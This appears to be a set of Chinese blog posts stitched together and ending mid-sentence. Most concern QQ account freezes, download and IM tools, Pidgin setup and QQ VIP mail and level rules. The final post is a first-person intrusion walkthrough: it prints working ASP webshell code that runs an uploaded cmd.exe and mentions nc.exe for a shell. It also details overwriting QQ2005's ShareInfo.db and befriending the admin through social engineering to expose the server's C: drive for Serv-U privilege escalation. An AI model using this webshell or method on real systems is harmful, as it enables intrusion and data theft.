今天看新闻才知道，腾讯收回QQ、丢QQ号被称为“丢号门”，现在这样的“门”那样的“门”，把人都给刺激得迷糊了。由于QQ的应用越来越广泛，并且随着使用日期的增长，QQ的重要性也越来越大，所以，如果QQ号码丢失必将给个人和业务造成极大的麻烦，如果再无法找回，更是损失巨大。

以下部分内容为新浪科技讯：

　　 (记者 段九如) 自己手头的198个QQ靓号全被改了密码、无法登录，网友肖承超近日遭遇了曾于去年在网络上盛传的“丢号门”事件。他称怀疑腾讯公司为再次销售获取利益，暗中回收了这些靓号。昨天，腾讯公司深圳总部为此声明称，他们发现这些号码存在频繁修改密码、私自买卖等现象，因此将账号冻结，原始购买人可通过提交证明及申诉程序取回号码。

　　>>批量丢号

　　网友自称损失6万元

　　肖承超称，自2007年8月开始，他不断在腾讯官方网站用Q币购买5至9位的QQ靓号，共计200余个，折合成现实货币的话每个号码的费用在100元至800元不等，且每个QQ靓号均需购买会员身份，“为了保有这些号，我一共花了6万多元”。

　　今年4月1日，肖承超突然发现自己所拥有的198个QQ靓号密码被改，且密码保护程序均被升级为2代，密码保护问题也被纂改，他无法通过密码保护程序自行找回密码。

　　肖承超介绍说，2008年4月，全国有大批网友纷纷发帖称自己QQ号码被盗，一时间“丢号门”事件成为网络热门话题。他在该事件中也曾丢失少部分号码，但因未保留在官网购买时的截图等证据，“只好吃了哑巴亏”。受到损失后，肖承超把之后购买的交易记录截图保留，并在一个本子上记下购买时间、密码等。

　　他表示，自己电脑中未保存写有号码、密码等信息的文件，黑客不可能通过木马程序获知密码盗号，“我去年丢的号现在都没被使用，肯定不是被黑客盗走再转卖”。另外，肖承超和众多网友遭遇一样——所丢失的号码注册年龄均被改为25岁，“一个黑客怎么能同时盗这么多号”。

　　>>囤号目的

　　失主原意进行倒卖

　　前天下午，记者在肖承超的电脑中看到其从腾讯官方网站购买QQ靓号交易记录的截图。

　　肖承超说，他已多次向腾讯公司提出申请以找回号码，但均告失败，“不知为什么”。

　　他承认自己购买QQ靓号的一大原因是为了私下倒卖，“现在这些号已经能卖到10多万元了”。他怀疑，腾讯公司以禁止私下买卖号码为由回收号码再次销售，“可号码都是我正当购买的，就算不让我倒卖，总不能不让我自己留用吧”。

　　目前，肖承超已就QQ号丢失一事向六里桥派出所报案。

　　记者在网络搜索引擎中输入“丢号门”，发现有很多网友发帖称自己有被冻结QQ号遭遇。记者查看315网站投诉记录，反映此事的网友留言多达数页。

　　>>腾讯回应

　　暂时冻结异常号码

　　昨天下午，腾讯公司深圳总部公关部负责人表示，经查实，肖承超所丢的198个QQ号为同一人在腾讯官方网站购买，但腾讯公司多次接到用户对此人的投诉。由于这些号码出现过异地登录或频繁修改密码的现象，腾讯公司无法认定该用户为此批号码的原始申请者。

　　另外，腾讯公司已明确在官方网站和用户协议中说明，为杜绝网络欺诈与盗号，禁止私下交易和买卖号码，而市面存在这批号码的私下交易信息，所以腾讯公司暂时冻结此批号码。

　　该负责人还说，若肖承超能够证明其为该批号码的原始购买者，腾讯公司将安排专门的客服人员与其联系，并在他提交号码申诉后对其号码进行相应的解冻。

　　腾讯公司同时呼吁，为保障QQ号码的安全性，避免滋生网络犯罪等问题，希望广大用户不要私下买卖号码，“2008年网络盗号木马比2007年高出48倍，我们希望用户不要给黑客提供谋取利益的市场”。

Linker个人认为，对腾讯QQ号码进行私下买卖，也算是新时期的一种投资行为，但在这样的买卖行为过程中，如果有诈骗行为混入其中的话，比如销售后再次通过密保取回再次出售，这样行为就非常恶劣了，这样的行为在网上屡见不鲜。如果存在这种情况，腾讯收回QQ号码，是为保障更多人的利益，维护QQ的使用环境，理所应当。

Linker在2001的时候，曾经申请到一个7位的QQ号码，但由于隔日太久，想不起密码，通过邮件申诉了无数次，一直显示不正确，到现在此QQ号码一直闲置着，没有另外人使用；好像有传闻，2003年以前的号码，腾讯都不会刻意收回。现在想来，还不如让腾讯直接把这个号码收回去得了，但需要能够证明这个QQ是由Linker所有，他们才能接受Linker的请求，如果能够证明，Linker就不必让腾讯收回了，这矛盾？……

去年有一段时间，对待有关腾讯以及QQ的话题，避之不及，主要当时Google AdSense上面充斥了大量的免费QQ的虚假广告，不胜其烦，为避相关性，因此闭口不谈。已经过了大半年了，看情况似有好转，近来有关腾讯的消息也比较多，不外乎可怜的QQ版本千奇百怪，让人眼花缭乱，无所适从。并且，由于QQ的广泛流行度，QQ骗局也是越来越多，小心又小心。

现在国人的windows系统上，甚至linux桌面系统上，很少没有安装腾讯QQ的，腾讯QQ的便利在各个方面都有体会的，比如在线叙旧聊天，在线电子商务，谈恋爱诉相思等等。

今天刚重装了系统，以前经常习惯使用TM2008，这东东到现在，一年没更新了，还beta着，但Linker发现，TM2008，已经不敢再用了。安装了之后，由于有以前的数据库备份，因此直接敲密码进入，发现在输键盘的时候，会自动增加字符，以为是以前数据库记录的关系，删掉以前的数据库，重新建立账号，但发现输入密码时，还会有增加字符，然后登陆就提示密码不正确，见鬼了？如果把TM的软键盘调用出来，就可以正常登陆，试过多次，故障依旧，但使用QQ2009，登陆就正常。试来试去，还是作罢，算了，还是使用QQ2009吧，发现最新版本是QQ 2009 RC 650，版本真是多。使用QQ2009，导入以前的TM信息记录很简单，选择TM的账号所在目录就可以了。 

刚登陆没有多长时间，就发现有人给发来了一则消息： 

此消息发了之后，发送者立马就灰色了；中了大奖，你大爷的，你爷爷我这么好运气，用得着你们来孝敬，老子我早去买一千注500万的彩票了。投诉你个王八蛋。

如果这个号过几天还有人在用，Linker就向工信部举报腾讯，控告腾讯纵容诈骗，涉嫌伙同诈骗。

这种消息，现在由于腾讯的极力宣传，大伙已经早就警惕了，但还是有些杂碎在不知疲倦的群发，正如最近一段时间央视不断曝光的诈骗案件一样，数万亿国民，总是有不知道消息的，总是有经验不到的，一旦上当，就被这些瘪三给得逞了。前段有文称，阿里旺旺已经成了群发的垃圾窝，这确有其事，这非常简单的过滤手段，Linker也在奇怪为什么淘宝方面不直接干预，而致使垃圾消息横行，让千千万万的旺旺使用者费时费心费力的查看消息，关闭窗口，骂几句，还得继续等待着被蹂躏，被接受。好在阿里旺旺2008版本有过滤的功能，加上一些过滤，算是稍好一点。

腾讯QQ是个好软件，为大家带来了极大的便利，腾讯也是一个非常好的互联网公司，为大家免费提供了这么优秀的软件，但同时，Linker更希望，优秀的软件和公司，在细节方面能够更进一步的努力发展。比如TM2008不应该被冷遇？TM概念以后还要继续进行吗？还是要把QQ2008和TM2008合并至QQ2009？比如在控制和防范利用QQ诈骗、犯罪方面，应该处以更为严厉的措施。

容易嘛，这三更半夜的，发这么大的火……

前几日已经已经连续了几篇林网博客日常使用的软件–林网博客使用的电脑硬件和系统办公软件、林网博客使用的系统优化和系统防护软件、林网博客使用的网络浏览和博客更新软件，闲话少叙，今日继续聊一下日常使用的上传下载软件和IM即时通讯等工具。

下载工具

要说起最早使用的下载工具，非网络蚂蚁莫数了，可惜此软件已经多年不更新了，当年的163拨号时代网络蚂蚁可是立下了汉马功劳，记起当时看到网络蚂蚁下载速度能够达到5K就高兴得手舞足蹈，乐不可支，半个多小时下一首mp3（从互联网上下载的第一首mp3是后街男孩的《I Want It That way》，这是后街男孩的第一个专辑），那个激动喜悦的感觉至今仍然“余韵犹存”。后来也接触到网际快车，但在当时，网际快车的网络流行度是比不过网络蚂蚁的，包括之后的两三年；网际快车这么火热，是在网际快车沉寂多年以后获得千万元投资之后的事了，现在的网际快车拓展能力林网博客并不见好，现在只不过是在利用现在网络上的一些推广方法吃老本而已，没什么创新之处。

由于网络蚂蚁的不更新，后来很长一段时间使用自己修改过的网际快车，既绿色又方便，网际快车自带有一个FTP资源浏览器，下载很多论坛上的FTP资源时，极为方便。之后由于迅雷的出现，改变了这一习惯，这没有办法，要说拼单资源的下载能力，迅雷是拼不过网际快车的，但迅雷有了这自动搜索相似资源的“独特能力”，网际快车就逊色太多了；因此迅雷使用之普及，常居桌面一片天地，也就是顺利成章的事了。不管迅雷这一招道德与否，首先符合网络的共享精神，另一方面，确实为大家带来了实实在在的便捷，在此看来，迅雷风靡网络，再自然不过。

至于其他下载软件，比如网络吸血鬼、脱兔、影音传送带，BT下载类的，都是烟云过客，linux下的gwget和flashgot等，也不常使用，不多赘述。

上传工具

秦爱在他的推荐软件名单中，特别提到了免费软件Filezilla的速度很快，林网博客以前在使用Filezilla搭建Ftp服务器时也确实用过，性能非常之好，难得还是免费软件，但在纯粹Ftp客户端使用方面，据林网博客自测，效果上有些不如FlashFXP，但秦爱强调的是Filezilla免费，这方面确实难得；在这类软件中最早使用的并不是FlashFXP，而是2001年用的CuteFTP，后来最常用的反而是LeapFTP，LeapFTP小巧强大，界面相当友好，传输速度稳定，LeapFTP 与 FlashFXP 、CuteFTP 堪称 FTP 三剑客；相比之下FlashFXP 传输速度比较快，LeapFTP 传输速度稳定，CuteFTP 虽然相对来说比较庞大，但其自带了许多免费的 FTP 站点，资源丰富。总之来说，三者各有所长。特别提出的一点是，LeapFTP虽然传输速度比较稳定，但对文件的传输却总有断传，也就是传输的文件有时不完整，因此引起了很多调试网页时不必要的麻烦，后来才转而使用FlashFXP至今。

IM即时通讯工具

即时聊天工具，最早使用的是ICQ，当时虽然使用得比较早，但申请的也是9位数的，那应该是2000年的事了；而在1999年时，国内就出现一大批模仿ICQ的在线即时通讯软件，如最早的Picq、Ricq、Ticq(TQ) 、Qicq、Micq、PCicq、Oicq、OMMO等，新浪、网易、搜狐等也开发了类似的软件，如新浪的UC、网易的泡泡。QQ的前身OICQ也是在1999年2月第一次推出的，现在还有一个7位的QQ整天挂在我的好友列表里面，但却实在想不起来密码了，找密码也找不回了；腾讯QQ好似对比较早的QQ号码实行不收回制，因此，也不见此QQ转而为他人用，想想，可惜哟！现在用的几个八位的QQ都是在2001年那时申请的，当时是晚上无事，用163拨号，拨一次申请一个，再拨一次换个IP再申请一个，当时QQ已经有限制一个IP申请一个QQ的限制了，这么多QQ也无大用，自己常用一个，其他的都已做商用。

MSN也早用过，但一直难以形成习惯，申请的很多MSN账号，都是忘记了再申请，又再丢弃，难以坚持；Google的GTALK也是上过几次，但好友不多，也不常用；现在不论是常用的QQ、MSN、Gtalk都可做商用在线通讯，因此，在此方面来说，倒是商务交流的便利工具了。之后随着门户网站而诞生的软件，比如阿里旺旺、淘宝旺旺、百度HI等，这几乎每天都用，开玩笑，赚钱不积极，不仅仅是思想有问题的事啦！

常用的邮箱服务

说起邮箱方面，最早使用的是商都信息港的免费50M 371.net邮箱，但由于371免费邮的急于转向收费，让流行度甚广的371.net就此湮灭，事实上当时商业策略上，人们对于免费模式的转型，都没有找到好的形式，因此有些盲目，会采取急功进利的手法也是情有原，但如果当时371.net能够坚持下去，相比现在占据国内邮箱大半壁江山的网易免费免费，绝对不逞多让，甚至就不会有现在网易免费邮的红火现象了；可惜我那个7位QQ的密保邮箱就是371.net的，QQ取不回来，这也是最主要的原因之一。

新浪邮箱偏向于商务，但商务中又以用新浪VIP邮箱的居多，至于其他的126、163、21cn、sohu等邮局系统，又以163、126流行度最广，林网博客就经常使用126邮局系统，主要是因为在126邮局开放的第三天，林网博客就盯上了，连着申请了四个纯数字的邮箱，申请了一个六位字母的邮箱，现在这些大家可是绝对申请不来的了；在和外国通讯等方面，毫无疑问，使用最多的就是google的Gmail了，它的优秀，林网博客就不多说了。

现在的邮箱主要作用已经不是写信了，一般都作为传送文档、收取服务类文件所用，以后，邮箱的功能可能会更加弱化。

今天林网博客就主要聊这些，有关上传下载工具和IM即时通讯工具的使用方面，有需要交流的，欢迎留言；并且也欢迎投稿！

无意中在chinaunix中看到一则新闻，说一个pidgin的软件可以支持十几种即时通讯软件的登陆，在插图中看到了聊天窗口集成的界面，这个功能不错，于是就想用一下看看，至于说icq以及msn等功能，还没有过多的使用，暂时不深入研究。

到pidgin.im官方看了下，果然是支持很多的即时通讯，几乎主流的非主流的都有了：

Pidgin can work with:

AIM
Bonjour
Gadu-Gadu
Google Talk
Groupwise
ICQ
IRC
MSN
MySpaceIM
QQ
SILC
SIMPLE
Sametime
XMPP
Yahoo!
Zephyr

pidgin够强大吧，下面我就专来试一下pidgin登陆QQ的效果如何？以前可能接触过pidgin，但估计没搞成，就错过了

pidgin下载安装都很顺利，提供的有简体中文的支持，但在设置登陆的时候，确实遇到了一些麻烦；选择QQ，用户名、密码，这很简单，但在pidgin的高级里面，我如果要登陆外部，还是要设置代理的；代理用的是socks5的代理，但在QQ选项：使用TCP登陆（connect using tcp）这一项里面，着实费了一把功夫，搜索网上的ip，8000端口，443端口，tcp，udp等协议的登陆方式等，最好找到了一个方法：在服务器一栏填写“tcpconn2.tencent.com”，端口：8000，socks5代理填写好，然后让pidgin重新登陆，就可以看到登陆画面了。

有人分析说，用9位以下的密码才可以；但我用的10位密码，登陆正常。在使用过程中，还是感到了极大的不方便，呵，如果是商务应用的话，还是暂时不要使用，老实的用TM2007和TM2008版本吧，虽然TM2008现在还是一直在残缺状态。

以前就说过QQ的很多不公平现象，qq依然偏心会员，网络硬盘大升级，不公平:专门针对qq会员等级升级加速等，看来，QQ的这方面现象，还是会一直持续也去，并且，大家也清楚，这也是等级带来的利润来源。但，还是要提醒一句，腾讯你能够发展壮大的根本在哪里？谴责之言不必多说，还是再介绍一下这个vip邮件的活动吧；

1. 该功能特权面向所有QQ会员用户，@vip.qq.com邮箱域名的注册及使用权仅供QQ会员所有，一个会员号码只可注册与本QQ号码同邮箱的一个@vip.qq.com邮箱域名；非会员不能注册@vip.qq.com邮箱；此会员特权详情请见功能详情介绍；
2. 注册过程中，按会员等级高低进行限时抢注， VIP5–VIP6用户可以比其他用户提前24小时抢注自己的好名，VIP5—VIP6 于2008.1.17日上午10点起即可抢注；VIP1—VIP4 于2008.1.18日上午10点起即可抢注；
3. 关于@vip.qq.com邮箱域名的注册及使用规则请参见QQmail官方网站说明；
4. 腾讯客服电话0755-83765566，本活动解释权归腾讯公司所有。
5.   “英文邮箱帐号@vip.qq.com”是QQ邮箱新提供的vip邮件地址,具有独特尊崇域名,大量让您心仪的好名字等待注册!
6. QQ会员需要通过注册@vip.qq.com的邮箱名才可开启此域名的使用;注册支持英文及数字用户名;您一定要快哦,抢先注册才可拥有自己喜欢的邮箱名哦!
7.  注册后,您的一个QQ邮箱将同时拥有多个邮件地址.@vip.qq.com的地址与您现有的QQ号码@qq.com或已注册的邮箱名@qq.com的地址都对应同一个邮箱、都可以收发邮件.因此,您注册使用了vip邮箱帐号后, 也无需逐一通知您的好友,原有地址照样使用.
         发信:注册完@vip.qq.com的邮箱后,系统将默认使用@vip.qq.com的邮箱名进行发信,您也可以进入邮箱设置里更换默认的发信邮箱名;
         收信:两个邮箱名收到的信将保存在同一邮箱里,更加方便地阅读所有来信;
8. 会员业务过期后,您所申请的VIP邮箱我们有可能将会为您冻结保存三个月,如果冻结在冻结期间,您可以使用@vip.qq.com邮箱名收信,但是不能继续使用其发信,重新开通会员后即可正常使用@vip.qq.com写信,收信;也请继续关注官方网站的进一步信息.

   注：没有注册及开通QQ号码+@qq.com的用户，需要先开启@qq.com邮箱后才可注册VIP邮箱。

9. 所面向用户
   @vip.qq.com邮箱的注册及使用权只面向全体QQ会员。
   ·操作方法 QQ会员请先登录抢注活动进行抢注；普通用户请先开通会员后注册VIP邮箱名； 登录进入邮箱页面后，根据提示即可完成注册，如果您喜欢的邮箱名已经被其他会员申请走了，千万别放弃，赶快把握机会，抢注到自己喜欢的邮箱名哦。 注册成功后，您即拥有一个以@vip.qq.com为域名的VIP邮箱了，尽情享受VIP邮箱带来的尊贵与特权体验吧。

http://mail.qq.com/cgi-bin/loginpage?templatename=loginpage_vip&frametype=html，现有的登陆账号也可以在此地址登陆，但登陆后依然是不带vip后缀的邮件。

英文帐号@vip.qq.com是QQ邮箱全新提供的vip邮件地址(免费)，连同@qq.com地址，QQ邮箱真正实现了一个邮箱两个域名。
vip邮件地址在现有QQ邮箱内，追加一个的新地址，实现多个地址共用同一个邮箱。原有的邮件地址照样使用，不用担心与好友失去联系。

在邮箱内新增@vip.qq.com邮件地址，是为了满足以下需求：
1、新的域名下，更容易注册到心仪的名字。
2、推荐您在商务等正式场合时使用vip邮箱地址，让您赢得更多信赖。也许，您会选择在名片上印上QQ邮箱的vip地址。
参考资料：http://mail.qq.com/cgi-bin/loginpage?templatename=loginpage_vip&frametype=html

英文帐号@vip.qq.com是QQ邮箱全新提供的vip邮件地址(免费)，连同@qq.com地址，QQ邮箱真正实现了一个邮箱两个域名。
vip邮件地址在现有QQ邮箱内，追加一个的新地址，实现多个地址共用同一个邮箱。原有的邮件地址照样使用，不用担心与好友失去联系。

 

在邮箱内新增@vip.qq.com邮件地址，是为了满足以下需求：
1、新的域名下，更容易注册到心仪的名字。
2、推荐您在商务等正式场合时使用vip邮箱地址，让您赢得更多信赖。也许，您会选择在名片上印上QQ邮箱的vip地址。

  

关于vip邮箱地址的使用：

 

 

 ·查看、管理邮件地址：
    您可以进入邮箱设置–帐户，查看您的邮箱地址。并可以自行更换默认的发信地址（默认发信地址会一直显示在邮箱页面的上方）。

 

   

 

 ·发信：
    注册完@vip.qq.com的地址后，系统将默认使用该地址进行发信（您也可以自行更换了默认的发信地址），您可以在写信时自由切换发信所用的地址。

 

   

 ·收信：
    不同邮件地址收到的信默认都将保存在收件箱里，可以方便地阅读所有来信。如果有需要，还可以利用设置中的过滤器功能（请注意选择的是“收件人”满足的条件），分别管理发向您的不同地址的邮件——例如发向您不同地址的邮件自动放置于不同的文件夹。

 ·登陆：
    可以依旧方便地通过QQ进入邮箱。也可以访问http://mail.vip.qq.com，在vip专属登陆页面中使用vip帐号登陆。如果使用原有帐号登陆的话，仍需通过http://mail.qq.com登陆（两个登陆页面的右上角有相互切换的入口）。

 

  &n
bsp;

 

 ·关于vip皮肤：
     注册完@vip.qq.com的地址后，系统将默认换上vip的专属皮肤。您也可以进入邮箱设置–换肤，自行更换喜欢的皮肤。

 

 ·关于在Foxmail等邮件软件中使用vip地址：
     首先请在邮箱设置–帐户页面的下方开启POP3/SMTP服务，然后就可以在foxmail(最新版本请访问http://fox.foxmail.com.cn/) /outlook等邮件软件中设置vip邮箱帐号。

     以下是设置时比较特殊的地方，请务必留意：

     因为QQ邮箱实现了一个邮箱两个域名，因此在“POP3帐户名”（outlook中叫做“用户名”）的填写时，必须填写完整的邮件地址才能识别。如需要填写完整的地址myname@vip.qq.com，而不能只填写myname。

 

    

 

抢注时间：
        VIP5—VIP6    2008-1-17日上午10点起即可抢注
        VIP1—VIP4    2008-1-18日上午10点起即可抢注

倒计时地址：http://vip.qq.com/act/2007/vipmail/
会员讨论：http://qqvip.qbar.qq.com/237775.htm

 ·注册（vip邮箱帐号无法注销，请认真选择喜欢的名字）：
    目前，仅仅QQ会员才可以注册vip邮件地址（于2008年1月17日上午开始，将陆续向QQ会员开放）。
    拥有vip邮箱帐号，目前并不拥有功能上的差别（例如邮箱大小不会变），但可能优先享受到陆续推出的更多邮箱服务。

呵，不是会员的登陆下场就是这样的。

不管怎么说，vip对于有些需要彰显身份的网络人来说，还是很有好处的，不过，等到普通会员也可以注册vip邮件以后，好的邮箱前缀估计也不多了；另外，有些品牌厂商想要保护自己的邮箱前缀，唯一的做法就是也加入会员来抢注自己的企业邮箱。

QQ的升级规则，自推出之时起，由于QQ的普及程度，也由于有意识无意识的攀比心理，大多数网友都投入到了疯狂的“挂QQ”浪潮中去了；期间由于“电费计算”风波，QQ被迫取消按天的升级规则，改为“一天最多计算两小时”的规则，此后，挂Q风潮，才一度受挫，逐渐平息；近段，针对QQ会员的vip升级规则，又渐渐的露出了水面。

从2007年11月29日中午12：00开始，在不改变原有计算方式的情况下，加速QQ会员等级升级。QQ会员用户在原有通过每天在线2小时累积活跃天数来获取相应QQ等级增长的基础上，还可以根据QQ会员VIP等级的不同来获得更多的每天在线时长，从而累积更多的活跃天数，获得更高的QQ等级。

“活跃天数”积累方法如下：

普通用户为：
    当天（0：00-23：59）使用QQ在2小时（及2小时以上），算用户当天为活跃天，为其活跃天数累积1天。
    当天（0：00-23：59）使用QQ在0.5小时至2小时，为其活跃天数累积0.5天。
    当天（0：00-23：59）使用QQ在0.5小时以下的，不为其累积活跃天数。

QQ会员为：

 当天（0：00-23：59）使用QQ在2小时（及2小时以上）,根据VIP等级的不同，QQ会员用户最多可以为其活跃天数累积1.6天。
QQ会员VIP等级 每天在线 可累积活跃天数 VIP1 2小时 1.1天 VIP2 2小时 1.2天 VIP3 2小时 1.3天 VIP4 2小时 1.4天 VIP5 2小时 1.5天 VIP6 2小时 1.6天

    当天（0：00-23：59）使用QQ在0.5小时至2小时，为其活跃天数累积0.5天。
    当天（0：00-23：59）使用QQ在0.5小时以下的，不为其累积活跃天数。

    查看关于QQ会员QQ等级加速特权更多详情请登陆QQ会员官方网站(http://vip.qq.com)。

    特别说明：QQ2006 Beta2版本以后所有版本均支持本特权，如果您当前的QQ版本不支持使用本特权，请登陆腾讯软件门户(http://im.qq.com/qq/) 下载最新版本的QQ软件。同时QQ2007II Beta1版本前各QQ版本中，将QQ等级的表现将由原有的时钟图标改成了更为直观的蓝色进度条。每次蓝 色液体充满玻璃管时，则代表QQ等级增长一级。在QQ2007II Beta1及之后最新发布的QQ版本保持原有时钟图标不变。

很是惊叹，毫无疑问，QQ会员为腾讯积累了大量的财富，也为大多数QQ业务贡献了更大的不平衡价值观和竞争力，但商业规则的机械和冷血依然让人感到很难以适应。腾讯从不闻其名的小小软件，由广大网民的凝聚力和互联网的迅猛发展，把它捧成为一个门户大颚，到了今天，似乎在渐渐的忽视，最普通的腾讯网民；今天，对于QQ会员的功能性眷顾，已经出现了明显的不平等功能因素（软件功能），而不是简单的服务偏差。普通网民，找回一个密码，都是巨大的困难，打一个客户电话，都面临着复杂的选择键，一系列的感触，越来越让我感觉到，一种强烈的不公平。事实上，这个消息，我看到的第一感觉，就是不公平。虽然，我理解，一分价钱一分货的理念，也知道，QQvip会员花了钱，应该享受到，更好的服务；注意，是服务，而不是功能。我已经习惯了，pw、dz等一些软件团队的服务化转变观念，对我而言，QQ也应该是这样的一种范畴，可能它不是，但我就是在这样理解，我想，这样理解的网友，应该大有人在。因此，这些理解促使我，觉得，这是一种强烈的不公平。

也许有人指责我，爱用不用？但我还是得用，虽然我说了这么多不公平，但我还是要以平和的心态使用QQ来和我的朋友、我的工作、我的事业，让它来相伴。

　　服务器上运行的第三方软件历来就被攻击者们看作是入侵目标系统的捷径。现在，著名的腾讯QQ又被列入了这些捷径名单，好在QQ并不是服务器必备 的软件之一，所以相信不会造成大范围的危机。文中遇到特殊情况虽然不多，但大家还是应该遵照“可能的就应该防范”的原则做出相应防御。

　　一、在Windows2003中得到的Webshell

　　此次渗透的目标是一台OA办公系统服务器。其操作系统新近升级到了Windows2003，但OA仍存在asp文件上传漏洞，所以webshell的取得并没有任何悬念。阻碍是在权限提升时遇到的。

　　登陆webshell后发现只能查看服务器的D盘，对C盘不能进行任何访问，webshell的提示是“没有权限”。这点早在意料之 中，因为wenshell只有guests组权限，再加上win2003默认禁止了“Everyone"匿名用户及“Guest"组权限用户访问 cmd.exe，还造成了不能通过webshell运行cmd.exe。

　　唯一值得庆幸的是利用Webshell 可以对D盘（存放有web虚拟目录）各个子目录进行读写。这里除了web虚拟目录还有一些数据备份文件和一个腾讯QQ安装目录Tencent。

　　二、破解Serv-u的终极防范

　　Windows2003的种种默认安全配置展示了它强大的一面，近一步提升现有权限似乎已不太可能，直到我试图从系统入手向这台服务器发出FTP链接请求并看到Serv-u的banner时才觉得又有了一线希望。

　　前面提到由于Windows2003对cmd.exe的权限限制，通过webshell方式不能运行cmd.exe，这样的论断在 2004年6期的防线的《构建Windows2003堡垒主机》一文也曾提到,但实践表明这并不正确，通过webshell上传本地非2003系统中未受 限制的cmd.exe文件到可执行目录，再通过wscript组件，同样能够通过webshell方式在Windows2003下获得相应权限的 cmd.exe。结合nc.exe，甚至还能得到一个guest组权限的命令行下的shell。

　　为此，我对老兵的站长助手6.0做了一些改进，增加了如下代码，使其能够利用Wscript.shell组件运行本地上传的cmd.exe。

Function CmdShell()  If Request("SP")<>"" Then Session("ShellPath") = Request("SP")  ShellPath=Session("ShellPath")  if ShellPath="" Then ShellPath = "cmd.exe"  if Request("wscript")="yes" then  checked=" checked"  else  checked=""  end if  If Request("cmd")<>"" Then DefCmd = Request("cmd")  SI="<form method='post'><input name='cmd' Style='width:92%' class='cmd'  value='"DefCmd&"'><input type='submit' value='运行'>"  SI=SI&"<textarea Style='width:100%;height:500;' class='cmd'>"  If Request.Form("cmd")<>"" Then  if Request.Form("wscript")="yes" then  Set CM=CreateObject(ObT(1,0))  Set DD=CM.exec(ShellPath&" /c "DefCmd)  aaa=DD.stdout.readall  SI=SI&aaa  else%>  <object runat=server id=ws scope=page classid="clsid:72C24DD5-D70A-438B-8A42- 98424B88AFB8"></object>  <object runat=server id=ws scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9- 00C04FD58A0B"></object>  <object runat=server id=fso scope=page classid="clsid:0D43FE01-F093-11CF-8940- 00A0C9054228"></object>  <%szTempFile = server.mappath("cmd.txt")  Call ws.Run (ShellPath&" /c " & DefCmd & " > " & szTempFile, 0, True)  Set fs = CreateObject("Scripting.FileSystemObject")  Set oFilelcx = fs.OpenTextFile (szTempFile, 1, False, 0)  aaa=Server.HTMLEncode(oFilelcx.ReadAll)  oFilelcx.Close  Call fso.DeleteFile(szTempFile, True)  SI=SI&aaa  end if  End If  SI=SI&chr(13)&"</textarea>"  SI=SI&"SHELL路径：<input name='SP' value='"&ShellPath&"' Style='width:70%'> "  SI=SI&"<input type='checkbox' name='wscript' value='yes'"&checked&">WScript.Shell</form>"  Response.Write SI  End Function

　　利用时只需在shell路径中指定上传的cmd.exe路径，再选中选项Wscript就能运行一些所需权限较低的系统命令，如“netstart”或者“netstat -an”，依次运行这两个命令后Webshell回显了众多服务，包括Serv-U FTP Server。 

　　活动端口列表中又出现了43958端口，于是我自然想到了神通广大的Serv-u ftp Server本地权限提升漏洞。可真正用到的ftp本地权限提升工具在执行系统命令时，却出现了530错误提示。看来管理员或者其他人对Serv-u打上 了布丁或者做了某些安全配置。

　　为了知道究竟是怎样的安全配置，上网查了查相关文章，其中有一篇《Serv-u ftp Server 本地权限提升漏洞的终极防范》很受欢迎，被多方转载，作者是世外高人xiaolu。从错误提示看很有可能做了该文所谓的终极防范，即对 ServUDaemon.exe中默认的管理员或密码进行了修改。

　　当然这只是假设，只有将目标服务器上的ServUDaemon.exe下载下来看看具体配置才能确定，但是安装有Serv-u的C盘禁止访问，包括Programe files 目录，权限提升再次受阻。

　　三、利用QQ2005共享文件漏洞将权限提升到底

　　再次翻了翻D盘，又见到了那个很少能在服务器中看到的Tencent文件夹。查看whatsnew.txt。

　　得知QQ的版本是QQ2005 Beta1，几个于相关文件的创建时间也说明网管最近在服务器上登陆过QQ。难道只能用QQ？经过一番思索，终于想到一个可以利用的QQ2005在文件共享功能上的一则漏洞。

　　该漏洞是随着QQ2005贺岁版新增功能出现的。可以将其危害描述为：利用该漏洞，攻击者可以浏览，读取用户系统中的任意文件（如sam文件、数据备份文件、敏感信息文件）。影响系统：安装有QQ2005贺岁版以上的所有Windows系列操作系统。

　　具体利用方法是：先在本机登陆自己的QQ，调出“QQ菜单”，选择工具－>设置共享，指定C:\或者其他任何有利用价值的分区为 共享文件，完成后关闭QQ，找到安装目录下的以QQ帐号命名的文件夹内“ShareInfo.db”文件。上传覆盖目标服务器上相同文件（如：D:\ Tencent\QQ\654321\ShareInfo.db）。这样，当网管在服务器上登陆QQ时就会向好友开放C盘为共享目录。

　　因为陌生人是不能共享对方文件，所以还需要用社会工程学申请将管理员加为好友(理由当然越可信越好)。如果管理员通过请求，服务器 的C盘会以QQ共享文件目录的名义被共享，原本不能通过WEBSHELL访问的ServUDaemon.exe文件就能被下载，遇到阻碍的权限提升之路又 能继续了。

　　当晚管理员就通过了申请，将我添加为好友。珊瑚虫QQ上显示的IP正是目标服务器的IP，于是下载了 ServUDaemon.exe文件，用UE打开后查找127.0.0.1，发现默认配置下的内置帐户“LocalAdministrator”果然被改 成了“LocalAdministruser”。

　　这看起来是一个很“终极”的防御，但提出该方法的xiaolu似乎没有进行攻防所须的换位思考就将其公布，要知道攻击者只需知道修 改后的配置，